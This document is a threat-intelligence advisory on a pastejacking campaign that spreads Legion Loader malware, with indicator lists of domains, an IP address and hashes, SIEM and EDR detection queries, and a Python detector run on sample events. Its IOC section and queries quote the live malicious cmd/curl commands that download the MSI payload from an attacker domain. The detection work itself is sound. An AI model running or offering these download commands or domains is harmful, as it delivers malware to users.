Evasive Campaign Pushing Legion Loader Malware

    Date: 04/04/2025

    Severity: High 

    Summary

    A stealthy web campaign is hijacking users' clipboards to trick them into executing MSI files tied to Legion Loader malware. The MSI files are disguised as "Klio Verfair Tools," a known alias for Legion Loader. The lure uses "pastejacking," also called "clipboard hijacking": the page copies a command to the clipboard and instructs the user to paste it into the Run window, where it fetches the MSI. The campaign evades detection through layered cloaking, including Turnstile/captcha gates, disguised blog-like download pages, a unique URL per infection, and links that do not function outside the intended infection flow.

    Indicators of Compromise (IOC) List

    Domain\URL :


    IP Address : 

    188.72.236.249

    Hash :

    21df75dccea2946c1a28d9c46e722cdeaee00482a57bca9286cda59b172b2d9b

    eef55d89a46dd43a2bd72852a5bd2929458da58f293e65f951a1d17c3a784440

    Commandline :

    cmd /k "curl -o %USERPROFILE%\Downloads\spill_guts_meaning_in_urdu00.msi hxxp[:]//admi2fib4exit[.]com/?download=4e4b619f && explorer /select,%USERPROFILE%\Downloads\spill_guts_meaning_in_urdu00.msi"

    cmd /k "curl -o %USERPROFILE%\Downloads\parallel_universe_books54.msi hxxp[:]//admi2fib4exit[.]com/?download=16827aff && explorer /select,%USERPROFILE%\Downloads\parallel_universe_books54.msi"

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Domain\URL 1 :

    domainname like "bestknowledgegood.com" or url like "bestknowledgegood.com" or siteurl like "bestknowledgegood.com" or domainname like "globalgreatexperiencegood.com" or url like "globalgreatexperiencegood.com" or siteurl like "globalgreatexperiencegood.com" or domainname like "file-link-all-simpleshop.com" or url like "file-link-all-simpleshop.com" or siteurl like "file-link-all-simpleshop.com" or domainname like "doup2dalf4if4shou.com" or url like "doup2dalf4if4shou.com" or siteurl like "doup2dalf4if4shou.com" or domainname like "fileaccesschannel.com" or url like "fileaccesschannel.com" or siteurl like "fileaccesschannel.com" or domainname like "realfileshareallfun24.com" or url like "realfileshareallfun24.com" or siteurl like "realfileshareallfun24.com" or domainname like "slud2mill.com" or url like "slud2mill.com" or siteurl like "slud2mill.com" or domainname like "fileparteveryfun24.com" or url like "fileparteveryfun24.com" or siteurl like "fileparteveryfun24.com" or domainname like "filepartallfunclub.com" or url like "filepartallfunclub.com" or siteurl like "filepartallfunclub.com" or domainname like "leto2nazi-glee.com" or url like "leto2nazi-glee.com" or siteurl like "leto2nazi-glee.com" or domainname like "realfilepartallfun.com" or url like "realfilepartallfun.com" or siteurl like "realfilepartallfun.com" or domainname like "upgradeupload.com" or url like "upgradeupload.com" or siteurl like "upgradeupload.com" or domainname like "webfile-link-all-easy.com" or url like "webfile-link-all-easy.com" or siteurl like "webfile-link-all-easy.com" or domainname like "fileshareallfun24.com" or url like "fileshareallfun24.com" or siteurl like "fileshareallfun24.com" or domainname like "infoaccessnetwork.com" or url like "infoaccessnetwork.com" or siteurl like "infoaccessnetwork.com" or domainname like "webfile-chain-all-easy.com" or url like "webfile-chain-all-easy.com" or siteurl like "webfile-chain-all-easy.com" or domainname like "duad-tess-piki.com" or url 
like "duad-tess-piki.com" or siteurl like "duad-tess-piki.com" or domainname like "hine-crull-cared-exiler.com" or url like "hine-crull-cared-exiler.com" or siteurl like "hine-crull-cared-exiler.com" or domainname like "alae-bema4om-ef.com" or url like "alae-bema4om-ef.com" or siteurl like "alae-bema4om-ef.com" or domainname like "ecb4teg4sepd4bunt.com" or url like "ecb4teg4sepd4bunt.com" or siteurl like "ecb4teg4sepd4bunt.com" or domainname like "seid-incaic-mayda.com" or url like "seid-incaic-mayda.com" or siteurl like "seid-incaic-mayda.com" or domainname like "ated-troy.com" or url like "ated-troy.com" or siteurl like "ated-troy.com" or domainname like "admi2fib4exit.com" or siteurl like "admi2fib4exit.com" or url like "admi2fib4exit.com" or domainname like "creditfileaccessnetworkshop.com" or url like "creditfileaccessnetworkshop.com" or siteurl like "creditfileaccessnetworkshop.com" or domainname like "file-connection-all-ez.com" or url like "file-connection-all-ez.com" or siteurl like "file-connection-all-ez.com" or domainname like "globalfileshareeveryfun24.com" or url like "globalfileshareeveryfun24.com" or siteurl like "globalfileshareeveryfun24.com" or domainname like "realcreditfileparteveryfun.com" or url like "realcreditfileparteveryfun.com" or siteurl like "realcreditfileparteveryfun.com" or domainname like "tappa-liter.com" or url like "tappa-liter.com" or siteurl like "tappa-liter.com" or domainname like "realfile-share-every-fun.com" or url like "realfile-share-every-fun.com" or siteurl like "realfile-share-every-fun.com" or domainname like "realmoreupload.com" or url like "realmoreupload.com" or siteurl like "realmoreupload.com" or domainname like "creditfile-share-every-fun.com" or url like "creditfile-share-every-fun.com" or siteurl like "creditfile-share-every-fun.com" or domainname like "creditfileparteveryfun.com" or url like "creditfileparteveryfun.com" or siteurl like "creditfileparteveryfun.com" or domainname like 
"globalfileshareeveryfun.com" or url like "globalfileshareeveryfun.com" or siteurl like "globalfileshareeveryfun.com" or domainname like "premiumexperiencegood.com" or url like "premiumexperiencegood.com" or siteurl like "premiumexperiencegood.com" or domainname like "file-link-all-easy.com" or url like "file-link-all-easy.com" or siteurl like "file-link-all-easy.com" or domainname like "great-experience-good24.com" or url like "great-experience-good24.com" or siteurl like "great-experience-good24.com" or domainname like "blend-centra.com" or url like "blend-centra.com" or siteurl like "blend-centra.com" or domainname like "thefile-share-every-fun.com" or url like "thefile-share-every-fun.com" or siteurl like "thefile-share-every-fun.com" or domainname like "best-experience-cool.com" or url like "best-experience-cool.com" or siteurl like "best-experience-cool.com" or domainname like "byrls-unfar-tankka.com" or url like "byrls-unfar-tankka.com" or siteurl like "byrls-unfar-tankka.com" or domainname like "carien-shafii.com" or url like "carien-shafii.com" or siteurl like "carien-shafii.com" or domainname like "creditfile-share-every-fun24.com" or url like "creditfile-share-every-fun24.com" or siteurl like "creditfile-share-every-fun24.com" or domainname like "fileaccessnetworksecurity.com" or url like "fileaccessnetworksecurity.com" or siteurl like "fileaccessnetworksecurity.com" or domainname like "webfile-link-all-simplecompany.com" or url like "webfile-link-all-simplecompany.com" or siteurl like "webfile-link-all-simplecompany.com"  or domainname like "filelinkallsimple.com" or url like "filelinkallsimple.com" or siteurl like "filelinkallsimple.com" or domainname like "best-experience-top.com" or url like "best-experience-top.com" or siteurl like "best-experience-top.com" or domainname like "premiumknowledgegood24.com" or url like "premiumknowledgegood24.com" or siteurl like "premiumknowledgegood24.com" or domainname like "thebetterfileupload.com" or url like 
"thebetterfileupload.com" or siteurl like "thebetterfileupload.com" or domainname like "hell4rec.com" or url like "hell4rec.com" or siteurl like "hell4rec.com" or domainname like "fileaccessibilitynetwork.com" or url like "fileaccessibilitynetwork.com" or siteurl like "fileaccessibilitynetwork.com" or domainname like "berapt-medii.com" or url like "berapt-medii.com" or siteurl like "berapt-medii.com"

    Domain\URL 2 :

    domainname like "best-knowledge-good24.com" or url like "best-knowledge-good24.com" or siteurl like "best-knowledge-good24.com" or domainname like "best-knowledge-top.com" or url like "best-knowledge-top.com" or siteurl like "best-knowledge-top.com" or domainname like "buyfile-enter-net.com" or url like "buyfile-enter-net.com" or siteurl like "buyfile-enter-net.com" or domainname like "cannel-hubshi-tock-perit.com" or url like "cannel-hubshi-tock-perit.com" or siteurl like "cannel-hubshi-tock-perit.com" or domainname like "creditfilechainalleasycompany.com" or url like "creditfilechainalleasycompany.com" or siteurl like "creditfilechainalleasycompany.com" or domainname like "creditfilechainallsimple.com" or url like "creditfilechainallsimple.com" or siteurl like "creditfilechainallsimple.com" or domainname like "file-access-web.com" or url like "file-access-web.com" or siteurl like "file-access-web.com" or domainname like "file-autolink-all-easy.com" or url like "file-autolink-all-easy.com" or siteurl like "file-autolink-all-easy.com" or domainname like "file-enter-web.com" or url like "file-enter-web.com" or siteurl like "file-enter-web.com" or domainname like "file-share-every-fun.com" or url like "file-share-every-fun.com" or siteurl like "file-share-every-fun.com" or domainname like "fileaccesscenter.com" or url like "fileaccesscenter.com" or siteurl like "fileaccesscenter.com" or domainname like "fileaccessnow.com" or url like "fileaccessnow.com" or siteurl like "fileaccessnow.com" or domainname like "filelinkallezcompany.com" or url like "filelinkallezcompany.com" or siteurl like "filelinkallezcompany.com" or domainname like "fundus-dung-hause-tellee.com" or url like "fundus-dung-hause-tellee.com" or siteurl like "fundus-dung-hause-tellee.com" or domainname like "globalfile-link-all-easy.com" or url like "globalfile-link-all-easy.com" or siteurl like "globalfile-link-all-easy.com" or domainname like "greatknowledgegood24.com" or url like 
"greatknowledgegood24.com" or siteurl like "greatknowledgegood24.com" or domainname like "mnem2ptt4brr-cats.com" or url like "mnem2ptt4brr-cats.com" or siteurl like "mnem2ptt4brr-cats.com" or domainname like "pahmi-argyll-shivey.com" or url like "pahmi-argyll-shivey.com" or siteurl like "pahmi-argyll-shivey.com" or domainname like "realfilemindparteveryfun.com" or url like "realfilemindparteveryfun.com" or siteurl like "realfilemindparteveryfun.com" or domainname like "realfilemindshareeveryfun.com" or url like "realfilemindshareeveryfun.com" or siteurl like "realfilemindshareeveryfun.com" or domainname like "sendfilelinkalleasy.com" or url like "sendfilelinkalleasy.com" or siteurl like "sendfilelinkalleasy.com" or domainname like "themoreuploaddesign.com" or url like "themoreuploaddesign.com" or siteurl like "themoreuploaddesign.com" or domainname like "themoreuploadllc.com" or url like "themoreuploadllc.com" or siteurl like "themoreuploadllc.com" or domainname like "webfilelinkallez.com" or url like "webfilelinkallez.com" or siteurl like "webfilelinkallez.com" or domainname like "yourdownloadbest.com" or url like "yourdownloadbest.com" or siteurl like "yourdownloadbest.com" or domainname like "fecuq.co.za/YmrXLWy8?keyword=%C3%A1lgebra%20y%20trigonometr%C3%ADa%20con%20geometr%C3%ADa%20anal%C3%ADtica%20ejercicios%20resueltos" or url like "fecuq.co.za/YmrXLWy8?keyword=%C3%A1lgebra%20y%20trigonometr%C3%ADa%20con%20geometr%C3%ADa%20anal%C3%ADtica%20ejercicios%20resueltos" or siteurl like "fecuq.co.za/YmrXLWy8?keyword=%C3%A1lgebra%20y%20trigonometr%C3%ADa%20con%20geometr%C3%ADa%20anal%C3%ADtica%20ejercicios%20resueltos" or domainname like "tevav.co.za/YmrXLWy8?keyword=camera%20canon%20powershot%20sx20is%20%C3%A9%20boa" or url like "tevav.co.za/YmrXLWy8?keyword=camera%20canon%20powershot%20sx20is%20%C3%A9%20boa" or siteurl like "tevav.co.za/YmrXLWy8?keyword=camera%20canon%20powershot%20sx20is%20%C3%A9%20boa" or domainname like 
"lovig.co.za/YmrXLWy8?keyword=modelo%20de%20memor%C3%A1ndum%20de%20llamada%20de%20atenci%C3%B3n%20por%20tardanza" or url like "lovig.co.za/YmrXLWy8?keyword=modelo%20de%20memor%C3%A1ndum%20de%20llamada%20de%20atenci%C3%B3n%20por%20tardanza" or siteurl like "lovig.co.za/YmrXLWy8?keyword=modelo%20de%20memor%C3%A1ndum%20de%20llamada%20de%20atenci%C3%B3n%20por%20tardanza" or domainname like "yubit.co.za/YmrXLWy8?keyword=mahatma%20gandhi%20biography%20pdf%20download" or url like "yubit.co.za/YmrXLWy8?keyword=mahatma%20gandhi%20biography%20pdf%20download" or siteurl like "yubit.co.za/YmrXLWy8?keyword=mahatma%20gandhi%20biography%20pdf%20download" or domainname like "colod.co.za/YmrXLWy8?keyword=how%20much%20is%20a%2020%20inch%20tv%20at%20walmart" or url like "colod.co.za/YmrXLWy8?keyword=how%20much%20is%20a%2020%20inch%20tv%20at%20walmart" or siteurl like "colod.co.za/YmrXLWy8?keyword=how%20much%20is%20a%2020%20inch%20tv%20at%20walmart" or domainname like "yoyep.co.za/YmrXLWy8?keyword=binomial%20theorem%20solution%20pdf%20worksheets%20answers%20answer/" or url like "yoyep.co.za/YmrXLWy8?keyword=binomial%20theorem%20solution%20pdf%20worksheets%20answers%20answer/" or siteurl like "yoyep.co.za/YmrXLWy8?keyword=binomial%20theorem%20solution%20pdf%20worksheets%20answers%20answer/" or domainname like "loheb.co.za/YmrXLWy8?keyword=paulo%20freire%20the%20banking%20concept%20of%20education%20analysis" or url like "loheb.co.za/YmrXLWy8?keyword=paulo%20freire%20the%20banking%20concept%20of%20education%20analysis" or siteurl like "loheb.co.za/YmrXLWy8?keyword=paulo%20freire%20the%20banking%20concept%20of%20education%20analysis" or domainname like "fecuq.co.za/YmrXLWy8?keyword=wilderness%20and%20the%20american%20mind%20chapter%20summaries" or url like "fecuq.co.za/YmrXLWy8?keyword=wilderness%20and%20the%20american%20mind%20chapter%20summaries" or url like "fecuq.co.za/YmrXLWy8?keyword=wilderness%20and%20the%20american%20mind%20chapter%20summaries" or siteurl like 
"fecuq.co.za/YmrXLWy8?keyword=wilderness%20and%20the%20american%20mind%20chapter%20summaries" or domainname like "norin.co.za/YmrXLWy8?keyword=bobbi%20brown%20makeup%20artist%20training" or url like "norin.co.za/YmrXLWy8?keyword=bobbi%20brown%20makeup%20artist%20training" or siteurl like "norin.co.za/YmrXLWy8?keyword=bobbi%20brown%20makeup%20artist%20training" or domainname like "gettraff.ru/wb?keyword=moneygram%20appleton%20wi" or url like "gettraff.ru/wb?keyword=moneygram%20appleton%20wi" or siteurl like "gettraff.ru/wb?keyword=moneygram%20appleton%20wi" or domainname like "ggtraff.ru/wb?keyword=spill%20guts%20meaning%20in%20urdu" or url like "ggtraff.ru/wb?keyword=spill%20guts%20meaning%20in%20urdu" or siteurl like "ggtraff.ru/wb?keyword=spill%20guts%20meaning%20in%20urdu"

    IP Address :

    dstipaddress IN ("188.72.236.249") or srcipaddress IN ("188.72.236.249")

    Hash :

    sha256hash IN ("eef55d89a46dd43a2bd72852a5bd2929458da58f293e65f951a1d17c3a784440","21df75dccea2946c1a28d9c46e722cdeaee00482a57bca9286cda59b172b2d9b")

    Detection Query (Windows Security) :

    resourcename = "Windows Security" and ((commandline like "cmd /k" and commandline like "curl -o %USERPROFILE%\Downloads\spill_guts_meaning_in_urdu00.msi" and commandline like "http://admi2fib4exit.com/?download=4e4b619f" and commandline like "&& explorer /select,%USERPROFILE%\Downloads\spill_guts_meaning_in_urdu00.msi") or (commandline like "cmd /k" and commandline like "curl -o %USERPROFILE%\Downloads\parallel_universe_books54.msi" and commandline like "http://admi2fib4exit.com/?download=16827aff" and commandline like "&& explorer /select,%USERPROFILE%\Downloads\parallel_universe_books54.msi"))

    Detection Query (EDR) :

    technologygroup = "EDR" and ((commandline like "cmd /k" and commandline like "curl -o %USERPROFILE%\Downloads\spill_guts_meaning_in_urdu00.msi" and commandline like "http://admi2fib4exit.com/?download=4e4b619f" and commandline like "&& explorer /select,%USERPROFILE%\Downloads\spill_guts_meaning_in_urdu00.msi") or (commandline like "cmd /k" and commandline like "curl -o %USERPROFILE%\Downloads\parallel_universe_books54.msi" and commandline like "http://admi2fib4exit.com/?download=16827aff" and commandline like "&& explorer /select,%USERPROFILE%\Downloads\parallel_universe_books54.msi"))
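    The two detection queries above match the exact command lines seen so far. As an added example (not part of the Gurucul advisory), the Python below generalizes them to the chain itself: cmd /k running curl -o into %USERPROFILE%\Downloads with an .msi name, followed by explorer /select on the same file. It runs over constructed sample process-creation events; WS02 uses the placeholder host example.invalid to show a hit on a domain that is not on the IOC list.

```python
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# Domain from the advisory's IOC list; lets a hit be labelled "known IOC" vs "pattern only".
KNOWN_IOC_DOMAINS = {"admi2fib4exit.com"}

# The chain the advisory describes: cmd /k runs curl, which writes an .msi into
# %USERPROFILE%\Downloads, then explorer /select opens the folder on that file.
PASTEJACK_CHAIN = re.compile(
    r'cmd(?:\.exe)?\s+/k\s+"?\s*curl(?:\.exe)?\s+(?:-[a-zA-Z]+\s+)*-o\s+'
    r'(?P<out>%USERPROFILE%\\Downloads\\[^\s"]+\.msi)\s+'
    r'(?P<url>https?://[^\s"&]+)'
    r'.*?&&\s*explorer(?:\.exe)?\s+/select,(?P<sel>[^\s"]+)',
    re.IGNORECASE,
)

@dataclass
class Finding:
    host: str
    url: str
    dropped_file: str
    same_file_opened: bool   # explorer /select points at the file curl wrote
    known_ioc: bool          # download host is in the advisory's IOC list

def detect_pastejack(event: dict) -> Optional[Finding]:
    """Return a Finding when a process-creation event shows the full chain."""
    m = PASTEJACK_CHAIN.search(event["commandline"])
    if m is None:
        return None
    host = (urlparse(m.group("url")).hostname or "").lower()
    return Finding(
        host=event["host"],
        url=m.group("url"),
        dropped_file=m.group("out"),
        same_file_opened=m.group("out").lower() == m.group("sel").lower(),
        known_ioc=host in KNOWN_IOC_DOMAINS,
    )

def scan(events: list) -> list:
    """Run the detector over a batch of events and keep only the hits."""
    return [f for f in map(detect_pastejack, events) if f is not None]

# Constructed sample events (not real telemetry). WS01 mirrors the command line
# quoted in the advisory; WS02 uses a placeholder host (example.invalid) to show
# the chain is caught even when the domain is not yet on the IOC list.
SAMPLE_EVENTS = [
    {"host": "WS01", "commandline": 'cmd /k "curl -o %USERPROFILE%\\Downloads\\spill_guts_meaning_in_urdu00.msi '
                                    'http://admi2fib4exit.com/?download=4e4b619f && '
                                    'explorer /select,%USERPROFILE%\\Downloads\\spill_guts_meaning_in_urdu00.msi"'},
    {"host": "WS02", "commandline": 'cmd /k "curl -o %USERPROFILE%\\Downloads\\parallel_universe_books54.msi '
                                    'http://example.invalid/?download=00000000 && '
                                    'explorer /select,%USERPROFILE%\\Downloads\\parallel_universe_books54.msi"'},
    {"host": "WS03", "commandline": 'curl -o C:\\temp\\report.pdf https://intranet.example.invalid/report.pdf'},
    {"host": "WS04", "commandline": 'cmd /k "dir %USERPROFILE%\\Downloads"'},
    {"host": "WS05", "commandline": 'explorer /select,%USERPROFILE%\\Downloads\\setup.msi'},
]
```

    Feed real process-creation command lines into scan() in place of SAMPLE_EVENTS; a Finding with known_ioc False is the case the exact-match queries would miss.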

    Reference:

    https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-03-31-IOCs-for-evasive-campaign-pushing-Legion-Loader.txt


    Tags: Malware, Evasive, Legion Loader, Pastejacking, Clipboard hijacking
